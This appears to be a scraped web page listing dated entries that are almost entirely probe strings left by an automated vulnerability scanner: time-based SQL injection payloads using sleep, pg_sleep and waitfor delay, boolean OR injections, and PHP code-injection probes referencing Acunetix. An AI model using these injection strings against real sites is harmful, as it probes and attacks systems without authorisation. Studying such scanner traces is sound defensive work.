  • -1 OR 2+63-63-1=0+0+0+1 --

    1

    2018-07-22
  • -1 OR 2+705-705-1=0+0+0+1

    1

    2018-07-22
  • -1' OR 2+710-710-1=0+0+0+1 --

    1

    2018-07-22
  • -1' OR 2+862-862-1=0+0+0+1 or 'kKcSaQlE'='

    1

    2018-07-22
  • ;print(md5(acunetix_wvs_security_test));

    1

    2018-07-22
  • -1" OR 2+111-111-1=0+0+0+1 --

    1

    2018-07-22
  • ';print(md5(acunetix_wvs_security_test));$a='

    1

    2018-07-22
  • if(now()=sysdate(),sleep(9),0)

    1

    2018-07-22
  • ";print(md5(acunetix_wvs_security_test));$a="

    1

    2018-07-22
  • 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

    1

    2018-07-22
  • ${@print(md5(acunetix_wvs_security_test))}

    1

    2018-07-22
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

    1

    2018-07-22
  • ${@print(md5(acunetix_wvs_security_test))}\

    1

    2018-07-22
  • (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

    1

    2018-07-22
  • 1 waitfor delay '0:0:6' --

    1

    2018-07-22
  • gP0f96fp'; waitfor delay '0:0:6' --

    1

    2018-07-22
  • lHpwrtPy';select pg_sleep(6); --

    1

    2018-07-22
  • Vhv1uIis');select pg_sleep(9); --

    1

    2018-07-22
  • T8AxCOme'));select pg_sleep(9); --

    1

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • 1'"

    1

    2018-07-22
  • \

    1

    2018-07-22
  • @@MT4eE

    1

    2018-07-22
  • JyI=

    1

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • scmxhfvg

    1

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • buujmrri

    1

    2018-07-22
  • fadrxuhk

    1acul0LZKMxupw

    2018-07-22
  • 1acuLYMImaosWw

    1

    2018-07-22